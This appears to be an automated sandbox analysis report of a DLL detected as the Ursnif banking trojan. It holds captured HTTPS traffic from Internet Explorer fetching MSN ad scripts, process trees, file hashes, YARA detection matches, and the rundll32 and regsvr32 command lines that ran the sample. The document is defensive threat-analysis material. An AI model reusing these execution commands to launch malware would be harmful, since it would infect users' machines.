2021-11-22 13:27:44 UTC	0	OUT	GET /tag?o=6208086025961472&upapi=true HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: btloader.com Connection: Keep-Alive
2021-11-22 13:27:44 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 22 Nov 2021 13:27:44 GMT Content-Type: application/javascript Content-Length: 10157 Connection: close Cache-Control: public, max-age=1800, must-revalidate Etag: "643eb1aad6ba3932ca744b96ffc00048" Vary: Origin Via: 1.1 google CF-Cache-Status: HIT Age: 2516 Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JrzsMPaxIAf9TNPexEXVig3BFRyCCAVbGfeHKINXO2mqrXLBrTJOKGm51jU%2BvyuiKHrfuFn9A%2Fpwt02KzWv5a33kmEmnUMIcmEsGiZq%2FdLm8iTMLAjh0rt%2FuQI9Mvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b227f388da5694b-FRA
2021-11-22 13:27:44 UTC	1	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c\|\|Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
2021-11-22 13:27:44 UTC	1	IN	Data Raw: 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e 76 61 6c 75 65 5d 29 2c 74 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 69 3d 74 3b Data Ascii: nction(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw\|\|((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;
2021-11-22 13:27:44 UTC	2	IN	Data Raw: 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d 7d 2c 77 3d 7b 74 72 61 63 65 49 44 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 Data Ascii: nt).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}},w={traceID:function(e,t,n){if
2021-11-22 13:27:44 UTC	4	IN	Data Raw: 70 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61 69 6e 3a 61 2c 61 70 69 44 6f 6d 61 69 6e 3a 64 2c 76 65 72 73 69 6f 6e 3a 62 2c 77 65 62 Data Ascii: p.websiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t\|\|((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,domain:a,apiDomain:d,version:b,web
2021-11-22 13:27:44 UTC	5	IN	Data Raw: 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 28 61 2b 74 29 29 29 7d 2c 61 2b 3d 74 7d 29 7d 76 Data Ascii: in:Math.trunc(100(+o+0)),max:Math.trunc(100(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100(s+ua)),max:Math.trunc(100(s+u(a+t)))},a+=t})}v
2021-11-22 13:27:44 UTC	7	IN	Data Raw: 7d 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 Data Ascii: }var a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;return i(this,function(e){switch(
2021-11-22 13:27:44 UTC	8	IN	Data Raw: 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 Data Ascii: bileContentEnabled="true"==localStorage.getItem("forceMobileContent")\|\|p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android\|bb\d+\|meego).+mobile\|avantgo\|bada\/\|blackberry\|blazer\|compal\|elaine\|fennec\|hiptop\|iemobile\|ip(hone\|od)\|iris\|kindle
2021-11-22 13:27:44 UTC	9	IN	Data Raw: 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 Data Ascii: \|o\|v)\|zz)\|mt(50\|p1\|v )\|mwbp\|mywa\|n10[0-2]\|n20[2-3]\|n30(0\|2)\|n50(0\|2\|5)\|n7(0(0\|1)\|10)\|ne((c\|m)\-\|on\|tf\|wf\|wg\|wt)\|nok(6\|i)\|nzph\|o2im\|op(ti\|wv)\|oran\|owg1\|p800\|pan(a\|d\|t)\|pdxg\|pg(13\|\-([1-8]\|c))\|phil\|pire\|pl(ay\|uc)\|pn\-2\|po(ck\|rt\|se)\|prox\|psio\|pt\-g\|qa\-a\|qc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49828	216.58.215.230	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:28:01 UTC	11	OUT	GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Connection: Keep-Alive
2021-11-22 13:28:01 UTC	11	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: image/x-icon Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media" Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]} Content-Length: 1078 Date: Sun, 21 Nov 2021 20:55:55 GMT Expires: Mon, 22 Nov 2021 20:55:55 GMT Last-Modified: Tue, 08 May 2012 13:08:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Age: 59526 Cache-Control: public, max-age=86400 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-11-22 13:28:01 UTC	12	IN	Data Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii: (& N(
2021-11-22 13:28:01 UTC	12	IN	Data Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49829	172.67.69.19	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:28:01 UTC	13	OUT	GET /px.gif?ch=1&e=0.5207611127885279 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad-delivery.net Connection: Keep-Alive
2021-11-22 13:28:01 UTC	13	IN	HTTP/1.1 200 OK Date: Mon, 22 Nov 2021 13:28:01 GMT Content-Type: image/gif Content-Length: 43 Connection: close X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw Expires: Tue, 23 Nov 2021 13:28:01 GMT Last-Modified: Wed, 05 May 2021 19:25:32 GMT ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3" x-goog-generation: 1620242732037093 x-goog-metageneration: 5 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 43 x-goog-hash: crc32c=cpEfJQ== x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow== x-goog-storage-class: MULTI_REGIONAL Access-Control-Allow-Origin: * Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace Age: 2618 Cache-Control: public, max-age=86400 CF-Cache-Status: HIT Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vTEFtWUjpJxehus9J7eaivJmbvgMecS8rk%2FS9P2Bx8cvCG5hBXjvsWoAJR9GLJ%2B6W2FOhaQN%2BeaboeAwNOtVds4D9Ws8MpHNdTVSjHzl58v93Zmgpp%2FW0drOeouXYMhxAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b227fa2e9c4692b-FRA
2021-11-22 13:28:01 UTC	14	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 Data Ascii: GIF89a!
2021-11-22 13:28:01 UTC	14	IN	Data Raw: 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: ,L;

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6196 Parent PID: 5740

General

Start time:	14:27:20
Start date:	22/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll"
Imagebase:	0xb70000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 900 Parent PID: 6196

General

Start time:	14:27:20
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6292 Parent PID: 6196

General

Start time:	14:27:21
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\2W6FcgEeMy.dll
Imagebase:	0x10000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 984 Parent PID: 900

General

Start time:	14:27:21
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6068 Parent PID: 6196

General

Start time:	14:27:21
Start date:	22/11/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff6449b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6432 Parent PID: 6196

General

Start time:	14:27:22
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,DllRegisterServer
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
